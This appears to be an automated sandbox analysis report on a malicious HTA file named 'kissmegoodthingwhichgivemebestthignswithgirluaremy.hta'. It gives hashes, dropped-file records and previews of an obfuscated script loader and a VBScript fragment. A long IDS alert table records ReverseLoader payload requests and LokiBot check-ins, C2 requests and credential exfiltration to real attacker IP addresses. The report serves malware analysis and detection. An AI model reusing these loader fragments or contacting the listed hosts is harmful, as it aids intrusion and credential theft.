                                                                                                                  SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: invoice727282_PDF..exe, Detection: malicious, Browse
                                                                                                                  • Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse
                                                                                                                  • Filename: 6038732).vbs, Detection: malicious, Browse
                                                                                                                  • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Jdxvyx.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Preview:1
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):47
                                                                                                                  Entropy (8bit):1.168829563685559
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:/lSll2DQi:AoMi
                                                                                                                  MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                                                                                                  SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                                                                                                  SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                                                                                                  SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                                                                                                  Malicious:false
                                                                                                                  Preview:........................................user.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (371), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):141862
                                                                                                                  Entropy (8bit):3.673972784160963
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:HimrsnAhOid+1d3duv8/DcFjk+2Vc3GyboSgt5pzIGwm:8AhOi01F8v8/wjk+2OGybxgt5pkGwm
                                                                                                                  MD5:100D059D24305DC95DB276AA180DC4CF
                                                                                                                  SHA1:CB2E9D345F365A0DC65B61CF40865B223C4688AD
                                                                                                                  SHA-256:87BE9D53A554146BCBAB91270C1EF35561F5168E6F84EA86C26D23B4C803247D
                                                                                                                  SHA-512:14F70627CBB1ADBB26D511D92558C471CA5354A1D0FA54A33D22D7C4933B6E1873871750F53318CD9C8D4E8B3F7627BAC2F4BAC3F295A67E2D35756AD951C8F5
                                                                                                                  Malicious:true
                                                                                                                  Preview:..........F.u.n.c.t.i.o.n. .d.e.s.e.m.p.e.n.o.(.B.y.V.a.l. .c.a.r.r.a.m.e.l.o.,. .B.y.V.a.l. .s.o.m.b.r.o.s.o.,. .B.y.V.a.l. .p.o.r.q.u.e.t.e.s.)..... . . . .D.i.m. .a.f.a.m.a.r..... . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.f.a.m.a.r. .>. .0..... . . . . . . . .c.a.r.r.a.m.e.l.o. .=. .L.e.f.t.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .-. .1.). .&. .p.o.r.q.u.e.t.e.s. .&. .M.i.d.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .+. .L.e.n.(.s.o.m.b.r.o.s.o.).)..... . . . . . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.a.f.a.m.a.r. .+. .L.e.n.(.p.o.r.q.u.e.t.e.s.).,. .c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.e.m.p.e.n.o. .=. .c.a.r.r.a.m.e.l.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .s.t.d.I.n...R.
                                                                                                                  File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                  Entropy (8bit):2.00054731549885
                                                                                                                  TrID:
                                                                                                                    File name:kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
                                                                                                                    File size:182'532 bytes
                                                                                                                    MD5:43f15554d66e784d988aa2da3ed2a136
                                                                                                                    SHA1:6d0fb362a8aa62a046e25435e6a525e2ca61492d
                                                                                                                    SHA256:5c7f1d6ac7671a1b1764dba808cf52f5c5c48ce1cbd0f1c16d8f6cf0afe5d3c8
                                                                                                                    SHA512:2c06f6a513bd10d648dfec384fc1056b0e8f39a830e0671f9098961076de61ac7db5e0dc7724a7ffd403a4769b90324aeb785d0b16c13dfe7dd24342a9460cd9
                                                                                                                    SSDEEP:96:4vCl17J1YiZVGTVy1YiZQGTVMFxfwVXNewJrC1YiZo1YiZDjGTVs1YiZkQ:4vCldfhjGTOheGTqHwShohxjGTYhuQ
                                                                                                                    TLSH:270495A9DC355CEDBBCC6D93B6FD72C8387C534B93E62E81822B3541DAA076C65C1821
                                                                                                                    File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-11-15T18:13:58.852111+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1192.3.243.13680192.168.2.549748TCP
                                                                                                                    2024-11-15T18:14:08.904488+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.549704192.3.243.13680TCP
                                                                                                                    2024-11-15T18:14:16.278435+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.549705TCP
                                                                                                                    2024-11-15T18:14:29.780577+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.549748192.3.243.13680TCP
                                                                                                                    2024-11-15T18:14:31.426231+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:31.426231+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:31.426231+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:32.403357+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54976194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:32.580658+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:32.580658+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:32.580658+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:33.528121+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54976694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:33.648797+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:33.648797+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:33.648797+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:34.615993+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:34.615993+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:34.621400+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549771TCP
                                                                                                                    2024-11-15T18:14:34.779935+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:34.779935+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:34.779935+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:35.751845+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:35.751845+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54977694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:35.757468+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549776TCP
                                                                                                                    2024-11-15T18:14:35.927180+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54978594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:35.927180+01002025381ET MALWARE LokiBot Checkin1192.168.2.54978594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:35.927180+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54978594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:36.861902+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54978594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:36.861902+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54978594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:36.867216+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549785TCP
                                                                                                                    2024-11-15T18:14:37.042044+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:37.042044+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:37.042044+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:37.995017+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:37.995017+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:38.000486+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549790TCP
                                                                                                                    2024-11-15T18:14:38.155116+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:38.155116+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:38.155116+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:39.112509+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:39.112509+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54979594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:39.118238+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549795TCP
                                                                                                                    2024-11-15T18:14:39.310499+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:39.310499+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:39.310499+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:40.262543+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:40.262543+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54980194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:40.267944+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549801TCP
                                                                                                                    2024-11-15T18:14:40.418721+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:40.418721+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:40.418721+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:41.385022+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:41.385022+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54980794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:41.391581+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549807TCP
                                                                                                                    2024-11-15T18:14:41.540423+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:41.540423+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:41.540423+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:42.507084+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:42.507084+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:42.512208+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549811TCP
                                                                                                                    2024-11-15T18:14:42.666273+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:42.666273+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:42.666273+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:43.612001+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:43.612001+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54981594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:43.617333+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549815TCP
                                                                                                                    2024-11-15T18:14:43.780827+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:43.780827+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:43.780827+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:44.789085+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:44.789085+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:44.796883+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549820TCP
                                                                                                                    2024-11-15T18:14:44.948157+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:44.948157+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:44.948157+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:47.376347+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:47.376347+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54982794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:47.382329+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549827TCP
                                                                                                                    2024-11-15T18:14:47.565744+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54983994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:47.565744+01002025381ET MALWARE LokiBot Checkin1192.168.2.54983994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:47.565744+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54983994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:48.529208+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54983994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:48.529208+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54983994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:48.534810+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549839TCP
                                                                                                                    2024-11-15T18:14:48.732748+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:48.732748+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:48.732748+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:49.701579+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:49.701579+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54984594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:49.707074+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549845TCP
                                                                                                                    2024-11-15T18:14:49.866643+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:49.866643+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:49.866643+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:50.823890+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:50.823890+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54985194.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:50.829216+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549851TCP
                                                                                                                    2024-11-15T18:14:51.015684+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:51.015684+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:51.015684+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:51.959024+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:51.959024+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54985694.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:51.964278+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549856TCP
                                                                                                                    2024-11-15T18:14:52.116189+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986294.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:52.116189+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986294.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:52.116189+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986294.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:53.063828+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986294.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:53.063828+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54986294.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:53.069205+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549862TCP
                                                                                                                    2024-11-15T18:14:53.231994+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:53.231994+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:53.231994+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:54.208036+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:54.208036+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54986994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:54.213464+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549869TCP
                                                                                                                    2024-11-15T18:14:54.415833+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:54.415833+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:54.415833+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:55.402259+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:55.402259+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54987594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:55.434663+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549875TCP
                                                                                                                    2024-11-15T18:14:55.567481+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:55.567481+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:55.567481+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:56.541320+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:56.541320+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988094.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:56.546595+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549880TCP
                                                                                                                    2024-11-15T18:14:56.697888+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:56.697888+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:56.697888+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:57.675629+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:57.675629+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988594.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:57.681469+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549885TCP
                                                                                                                    2024-11-15T18:14:57.888076+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:57.888076+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:57.888076+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54988994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:59.316568+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54988994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:59.316568+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54988994.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:59.322192+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549889TCP
                                                                                                                    2024-11-15T18:14:59.477956+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54989794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:59.477956+01002025381ET MALWARE LokiBot Checkin1192.168.2.54989794.156.177.9580TCP
                                                                                                                    2024-11-15T18:14:59.477956+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54989794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:00.437229+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54989794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:00.437229+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54989794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:00.442485+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549897TCP
                                                                                                                    2024-11-15T18:15:00.622720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:00.622720+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:00.622720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:01.556689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:01.556689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:01.562051+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549901TCP
                                                                                                                    2024-11-15T18:15:01.716470+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:01.716470+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:01.716470+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:02.676612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990594.156.177.9580TCP
